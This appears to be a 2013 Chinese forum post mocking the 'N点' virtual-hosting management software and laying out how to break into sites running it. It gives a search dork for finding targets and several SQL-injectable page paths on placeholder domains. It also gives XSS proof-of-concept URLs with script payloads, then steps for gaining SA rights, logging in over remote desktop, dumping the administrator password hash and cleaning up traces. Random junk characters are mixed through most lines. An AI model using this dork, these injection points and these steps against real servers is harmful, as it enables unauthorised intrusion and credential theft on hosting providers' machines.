不得不说N点实在是一个破东西
' ]3 s8 n. ^0 n2 |5 `5 m" `6 d就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂 i: T' W/ J+ V7 H1 z
好吧 抱怨一下就行了 接下来关键的时候到了
! f# B1 m9 R: C/ h. Y首先百度搜索关键字:inurl: (mmdatabase.asp)6 L7 f! E% i A9 Q* K
我随便列举一个: www.xxxx.com5 b) I) Q. r& w& h( q. H, _
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
& h& |4 {. |2 l! y" F2 c扔入NBSI 或者啊D等各种傻逼工具后' h& ^ N0 m* M" s9 _ x
你们会看到是SA权限0 N" E8 k! w, y0 l9 }3 G
果断3389 上去 hash得到administrator密码
% Q. ]- Z$ T3 Q+ ^# W/ `+ o8 h6 T- L擦屁股走人~3 a9 o. v6 V# O- q
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
. c( A$ R. N: s* S2 V/ M% O& } ! |4 L" w; [4 n/ \( ?1 T! T
再附上其他几个漏洞页面( o7 _0 m! a$ a; P& Y0 l$ A
SQL:% Q% m3 j3 g7 ^( `; a
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1( H- o, a2 o0 F
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11/ i" G- b M+ t+ j6 C
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=97 ~; S# d- ?% [0 s! K
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2! @' w7 U+ Q5 p! c. W
XSS证明:
. p, B: b. E) s/ T* M8 Phttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”/ h Q# Y9 ?) M# `3 D' J; i3 S
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”! h) r0 `9 Y8 P1 k5 x X1 \& C. z
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>3 q7 ]8 P# F: ^1 J; D* L2 f4 `0 ]/ @
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
; F4 \; \6 O0 G' S1 ?+ @6 Q还是星外吧 你们懂的$ R9 x5 q5 ~, V1 k& s! Q
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?4 P6 E4 x9 B5 H. Y) ~' y" J
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
/ G$ i7 c6 |' ^) Q——- |
发表于 2013-3-3 08:06:44
收藏
分享
支持
反对